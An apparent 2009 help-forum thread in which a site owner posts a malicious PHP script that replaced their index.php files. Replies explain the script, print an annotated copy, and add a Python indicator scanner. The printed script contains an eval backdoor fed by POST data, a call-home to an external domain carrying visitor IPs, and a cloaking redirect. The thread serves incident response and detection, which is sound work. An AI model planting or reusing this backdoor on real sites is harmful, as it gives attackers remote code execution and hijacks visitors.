Solved

Web hacked, indexes removed??

Posted on 2009-02-12
686 Views
Last Modified: 2013-11-16
Somebody this morning has removed all the index.php files from the sections of one of my sites and replaced them with the attached code. How can I prevent this from happening again, and how could this happen? Does someone have access to my folders?

Attached is the index.php with which they replaced the original ones.
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Question by:axtur
5 Comments
LVL 29

Expert Comment

by:Michael Worsham
ID: 23624360
Is this a shared hosting site or a dedicated hosting server?
LVL 29

Expert Comment

by:Michael Worsham
ID: 23624561
I did some quick research and the code seems to be some sort of header hack.

I did find a thread that has some PHP code someone wrote to run to detect pages that have this hack on their websites.
http://www.forum.optymalizacja.com/index.php?s=&showtopic=65618&view=findpost&p=506034

Author Comment

by:axtur
ID: 23625343
It's shared hosting. I tried to look at that forum, but I don't understand that language.

Is my server infected or anything? What am I doing wrong?
LVL 29

Expert Comment

by:Michael Worsham
ID: 23625539
If the hacker was able to access your account and modify your files, then your hosting provider has a serious breach and most likely your data is at risk. I recommend contacting your hosting provider and see if they have had any additional server-side intrusions. I would also send them a copy of the code you found so they can see if they are at risk as well for other sites.

Here is a Google Translated copy of the site (Polish to English):
http://translate.google.com/translate?hl=en&sl=pl&u=http://www.forum.optymalizacja.com/index.php%3Fshowtopic%3D65618&ei=tXSUSdXBMozMmQfO1p2NCg&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dtds_u.php%26hl%3Den%26safe%3Doff%26rlz%3D1B3GGGL_enUS287US287
LVL 1

Accepted Solution

by:IceCrack (earned 2000 total points)
ID: 23628871
Basically, that script reads the website user's IP, does something with it that returns a value of go or false (another value); then, if the value is go, it will submit the website's IP address to a database where they can find vulnerable websites to be used for spyware, spamware, virus injection and other security-related issues.

I suggest you get your host to upgrade their software and security, or move hosts.

Attached is a snippet of the code broken out into a programmer-readable version.

<?php
// Backdoor: if POST 'a' is present and POST 'b' equals sha1(md5(a)),
// base64-decode 'a' and eval() it as PHP. Note that 'b' is computed
// purely from 'a', so anyone who knows the scheme can pass the check.
$a = @$_POST['a'];
if ($a && @$_POST['b'] == sha1(md5($a))) {
    $a = base64_decode($a);
    eval($a);
}

// Ask the attacker's server whether this visitor (identified by IP) should
// be redirected. Returns true only when the remote response is exactly "go".
function get_counter()
{
    $ip = $_SERVER['REMOTE_ADDR'];
    $uniq = @file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");
    if ($uniq === false) {
        return false;
    }
    if ($uniq == "go") {
        return true;
    }
    return false;
}

// Cloaking: visitors whose referrer contains "google" or "yahoo" (but not
// the crawler-looking "bot.htm" / "slurp" referrers) are redirected to the
// attacker's traffic distribution script, passing this site's host name.
$ref = strtolower(trim(@$_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
    if (get_counter()) {
        @header("Location: http://gogapartnership.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
    if (get_counter()) {
        @header("Location: http://gogapartnership.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}
?>

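The posted index.php does three separate things that a scanner can look for, which is what Michael's detection-script reference and IceCrack's walkthrough above are both getting at: an eval() backdoor fed from POST data, a referrer-based cloaking redirect for search-engine visitors, and a call-home that sends each visitor's IP to an external host. The following is an added example, not code from this thread or the linked Polish forum; the directory layout, the file names and the clean sample page are constructed for illustration, and the indicator names are this example's own. It also re-implements the backdoor's sha1(md5(a)) check in Python to show that the token "b" is derived entirely from "a", so it is no authentication at all.

```python
"""Indicator scan for the PHP backdoor / cloaking script posted above.

Added example; not from the original thread. File layout, sample page
contents and indicator names are constructed for illustration.
"""
import base64
import hashlib
import os
import re
import tempfile

# One regex per behaviour visible in the posted index.php.
PATTERNS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "post_input": re.compile(r"\$_POST\s*\[", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "hash_chain_auth": re.compile(r"\bsha1\s*\(\s*md5\s*\(", re.I),
    "referer_check": re.compile(r"HTTP_REFERER", re.I),
    "search_engine_match": re.compile(
        r'''strpos\s*\(\s*\$\w+\s*,\s*["'](google|yahoo|bing|msn)["']''', re.I),
    "external_redirect": re.compile(
        r'''header\s*\(\s*["']Location:\s*https?://''', re.I),
    "remote_callback": re.compile(
        r'''file_get_contents\s*\(\s*["']https?://''', re.I),
}


def matched_patterns(src):
    """Names of all indicator regexes that match the PHP source."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(src))


def classify(src):
    """Turn raw pattern hits into findings; single hits alone are not enough."""
    hits = set(matched_patterns(src))
    findings = []
    if {"eval", "post_input"} <= hits:
        findings.append("backdoor: eval of POST data")
    if {"referer_check", "search_engine_match", "external_redirect"} <= hits:
        findings.append("cloaking: search-engine visitors redirected off-site")
    if "remote_callback" in hits:
        findings.append("callback: visitor data sent to external host")
    return findings


def scan_tree(root):
    """Walk a document root and map each suspicious PHP file to its findings."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = classify(fh.read())
            if findings:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                results[rel] = findings
    return results


def backdoor_token(a):
    """PHP's sha1(md5($a)): hex md5 of a, then sha1 of that hex string."""
    md5_hex = hashlib.md5(a.encode()).hexdigest()
    return hashlib.sha1(md5_hex.encode()).hexdigest()


def backdoor_accepts(a, b):
    """The exact gate the posted script puts in front of eval()."""
    return bool(a) and b == backdoor_token(a)


# Constructed samples: the script from the thread, and an ordinary page.
POSTED_SCRIPT = '''<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>'''

CLEAN_INDEX = '''<?php
// ordinary landing page (constructed sample)
require_once __DIR__ . '/config.php';
echo "<h1>Welcome</h1>";
?>'''


def build_sample_site():
    """Create a throwaway document root with one clean and one replaced index.php."""
    root = tempfile.mkdtemp(prefix="scan-demo-")
    os.makedirs(os.path.join(root, "blog"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(CLEAN_INDEX)
    with open(os.path.join(root, "blog", "index.php"), "w") as fh:
        fh.write(POSTED_SCRIPT)
    return root


if __name__ == "__main__":
    for path, findings in scan_tree(build_sample_site()).items():
        print(path, "->", "; ".join(findings))
    payload = base64.b64encode(b'echo "hi";').decode()
    print("token forged from 'a' alone accepted:",
          backdoor_accepts(payload, backdoor_token(payload)))
```

Run it against the real document root instead of the sample tree and diff the result against a known-good copy of the site; the regexes deliberately key on behaviour (eval of request data, referrer-conditional external redirect, call-home) rather than on the one domain in this sample, so they will also catch variants that point elsewhere. A hit on "eval of POST data" alone is enough to treat the host account as compromised, because, as backdoor_accepts shows, the hash check does not require any secret.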
